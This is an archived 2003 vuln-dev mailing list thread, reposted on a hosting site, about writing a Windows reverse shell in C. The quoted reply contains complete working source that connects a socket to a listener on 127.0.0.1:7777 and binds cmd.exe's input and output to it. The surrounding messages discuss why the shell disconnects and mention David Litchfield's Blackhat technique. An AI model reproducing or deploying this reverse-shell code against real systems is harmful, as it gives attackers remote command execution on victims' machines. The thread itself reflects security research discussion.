Pantek Library
Hosting Provided By
CybrHost
High Speed Hosting
Mailing Lists: securityfocus.com > vuln-dev > 03 > 020160.html (Request Expert securityfocus.com Support)

Re[2]: Windows reverse Shell

From: Adik <netninja(at)hotmail.kg>
Date: Wed Feb 05 2003 - 04:03:03 EST

Hello 3APA3A,

Thnx for ur code. The one i wrote is absolutely the same without bind. Infact we dont need "bind", though David Litchfield mentions it in his Blackhat talk. SO anyway did u try compiling ur code? if not u should try, coz i c the same results,ie i get connection on my netcat, but then it suddenly disconnects. no command prompt.

Tuesday, February 4, 2003, 10:34:56 PM, you wrote: 

3> Return-Path: <3APA3A@SECURITY.NNOV.RU>
3> X-Sieve: cmu-sieve 2.0
3> Received: from woland.freenet.kg (woland.freenet.kg [212.112.99.34])
3>         by mail.hotmail.kg (Hotmail.KG edition/Version 1.0) with ESMTP id h14GVEb17456
3>         for ; Tue, 4 Feb 2003 21:31:14 +0500 (KGT)
3> Received: from adm.sci-nnov.ru (adm.sci-nnov.ru [195.122.226.2])
3>         by woland.freenet.kg (8.12.6/8.12.6) with ESMTP id h14HtUoc013643
3>         for ; Tue, 4 Feb 2003 22:55:39 +0500
3> Received: from anonymous.sandy.ru (anonymous.sandy.ru. [195.122.226.40])
3>         by adm.sci-nnov.ru (8.11.6/8.11.6) with ESMTP id h14GYuu38518;
3>         Tue, 4 Feb 2003 19:34:56 +0300 (MSK)
3>         (envelope-from 3APA3A@SECURITY.NNOV.RU)
3> Date: Tue, 4 Feb 2003 19:34:56 +0300
3> From: 3APA3A <3APA3A@SECURITY.NNOV.RU>
3> X-Mailer: The Bat! (v1.61)
3> Reply-To: 3APA3A <3APA3A@SECURITY.NNOV.RU>
3> Organization: 
http://www.security.nnov.ru
3> X-Priority: 3 (Normal)
3> Message-ID: <
1939904491.20030204193456@SECURITY.NNOV.RU>
3> To: SecFocus 
3> CC: vuln-dev@securityfocus.com
3> Subject: Re: Windows reverse Shell
3> In-Reply-To: <
1028124981.20030204013745@hotmail.kg>
3> References: <
1028124981.20030204013745@hotmail.kg>
3> MIME-Version: 1.0
3> Content-Type: text/plain; charset=Windows-1251
3> Content-Transfer-Encoding: 8bit

3> Dear NetNinja,

3> Code below successfully brings reverse shell to 127.0.0.1:7777. 

3> #include 
3> #include 
3> #include 

3> int main(int argc, char* argv[]){
3>  WSADATA wd;
3>  HANDLE h;
3>  SOCKET sock;
3>  STARTUPINFO si;
3>  PROCESS_INFORMATION  pi;

3> struct sockaddr_in sin;
3> int size = sizeof(sin); 
3>  memset(&sin, 0, sizeof(sin));
3>  memset(&si, 0, sizeof(si));
3>  WSAStartup(MAKEWORD( 1, 1 ), &wd);
3>  sock=WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
3>  sin.sin_family = AF_INET;
3>  bind(sock, (struct sockaddr*)&sin, size);
3>  sin.sin_port = htons(7777);
3>  sin.sin_addr.s_addr = inet_addr("127.0.0.1");

Do you need help?X

3>  connect(sock, (struct sockaddr*)&sin, size);
3>  si.cb = sizeof(si);
3>  si.dwFlags = STARTF_USESTDHANDLES;
3>  si.hStdInput = si.hStdOutput = si.hStdError = sock;
3>  CreateProcess(
3>         NULL,
3>         "cmd.exe",
3>         NULL,
3>         NULL,
3>         TRUE,
3>         0,
3>         0,
3>         NULL,
3>         &si,
3>         &pi
3>  );
3>  return 0;
3> }

3> --Monday, February 3, 2003, 10:37:45 PM, you wrote to vuln-dev@securityfocus.com:

N>> Hello guys, 

N>> David Litchfield in his Blackhat talk, talked about using socket handle
N>> from WSASocket() and pass that handle as a parameter to stdin, stdout
N>> and stderr for CreateProcess function. By doin this way his reverse
N>> cmd shellcode becomes much smaller. I tried coding that reverse
N>> command shell in C, but couldnt get it to work. It simply connects to
N>> my listening netcat listener and then disconnects. David Litchfield
N>> used 4 functions to achieva that WSASocket, bind, connect and
N>> CreateProcess. A lil help would b appreciated on building this reverse
N>> cmd shell. thanx.
  

-- 
Best regards,
 Adik                            mailto:netninja@hotmail.kg
Received on Wed Feb 5 12:26:21 2003
Do you need more help?X

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:38 EDT

Contact Us  Legal Notices  Order Services Online 
Pantek Home  Privacy Policy  IT news  Site Map  Pantek Library